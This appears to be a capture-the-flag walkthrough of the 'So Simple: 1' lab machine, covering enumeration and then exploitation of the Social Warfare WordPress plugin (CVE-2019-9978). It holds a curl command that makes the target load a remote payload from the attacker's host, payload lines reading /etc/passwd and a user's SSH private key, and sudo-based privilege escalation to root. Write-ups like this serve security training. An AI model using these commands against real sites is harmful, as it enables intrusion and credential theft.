So Simple: 1 Walkthrough
reference | So Simple: 1 |
target ip | 192.168.1.10 |
Scan with nmap
:
data:image/s3,"s3://crabby-images/54080/540805a4e732547d61b5fa2fedc1c8f23f84b360" alt="nmap"
SSH only support publickey auth method.
No need to hydra
SSH service.
data:image/s3,"s3://crabby-images/2c303/2c303ef9101be6528e447422a9ba56d3228c2abf" alt="nmap_ssh"
Enumerate HTTP service with gobuster
:
data:image/s3,"s3://crabby-images/b8ff0/b8ff019feb64e7968eb48a62562dad47ae7c0d0d" alt="gobuster"
Enumerate WordPress with wpscan
:
1 | wpscan --url http://192.168.1.10/wordpress --no-banner |
data:image/s3,"s3://crabby-images/4ce02/4ce020e518272d299e621f02428398bc1ce2ca05" alt="social-warfare"
Original exploit is hash3liZer/CVE-2019-9978 and Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE).
Here I use curl
to make it clearer.
1 | <pre>system('cat /etc/passwd')</pre> |
Exploit:
1 | curl -s http://192.168.1.10/wordpress/wp-admin/admin-post.php\?swp_debug\=load_options\&swp_url\=http://192.168.1.89:8000/payload.txt |
data:image/s3,"s3://crabby-images/fcc38/fcc380f4e0425826664ba6083c3765809745252d" alt="exploit_passwd"
There are two users (max and steven).
Try to enumerate ssh private key, since SSH service only allows publickey auth method.
www-data
has the privilege to view the content of /home/max/.ssh/id_rsa
, which can be used to login via SSH.
1 | <pre>system('cat /home/max/.ssh/id_rsa')</pre> |
Exploit again:
1 | curl -s http://192.168.1.10/wordpress/wp-admin/admin-post.php\?swp_debug\=load_options\&swp_url\=http://192.168.1.89:8000/payload.txt |
data:image/s3,"s3://crabby-images/f5ecc/f5ecc434387df2e506c4f4d34fbbe1e3f5650a09" alt="exploit_ssh"
Copy and save to local file, chmod 400 ./max.id_rsa
.
data:image/s3,"s3://crabby-images/e94b3/e94b32f18c4eb13dc90409f87550fe2e70fad409" alt="ssh_max"
/home/max/user.txt
:
data:image/s3,"s3://crabby-images/1d55a/1d55a02059cdbbe674dc99cfd7aab5bbb854c6fc" alt="user.txt"
Privilege escalation from user max to user steven:
data:image/s3,"s3://crabby-images/a44d1/a44d1d38d973ef7869a1b6f893a616c0b7898abb" alt="sudo_max"
/home/steven/user2.txt
:
data:image/s3,"s3://crabby-images/77e46/77e468d5d89724e5467995cf112243cc83ded488" alt="user2.txt"
Privilege escalation from user steven to user root:
data:image/s3,"s3://crabby-images/48841/48841775f8bca7cffbf1cf6269f7880f0bb00eb2" alt="sudo_steven"
There’s no /opt/tools
, mkdir
first.
Then place any commands you want to run as root:
data:image/s3,"s3://crabby-images/4509a/4509a43046a5f57c864c784e0e8157381912ecd6" alt="server-health"
/root/root.txt
:
data:image/s3,"s3://crabby-images/cf4ac/cf4ac86468a21006174faeb5302e00aaa736ac95" alt="root.txt"
http://192.168.1.10/wordpress/wp-content/uploads/simple-file-list/
data:image/s3,"s3://crabby-images/b36e7/b36e7ebe59caaddf9f63183ed66df539d631ccf3" alt="simple-file-list"
Related exploit is WordPress Plugin Simple File List 5.4 - Remote Code Execution.
But there’s no http://192.168.1.10/wordpress//wp-content/plugins/simple-file-list/ee-upload-engine.php
and http://192.168.1.10/wordpress//wp-content/plugins/simple-file-list/ee-file-engine.php
.
/home/max/personal.txt
data:image/s3,"s3://crabby-images/75b05/75b054949c6e961f94eb59acb5073f7e37914604" alt="personal.txt"
/home/max/this
data:image/s3,"s3://crabby-images/dc0e0/dc0e0461996b5b4c0d733323afed89680e4f7a54" alt="this"
nonsense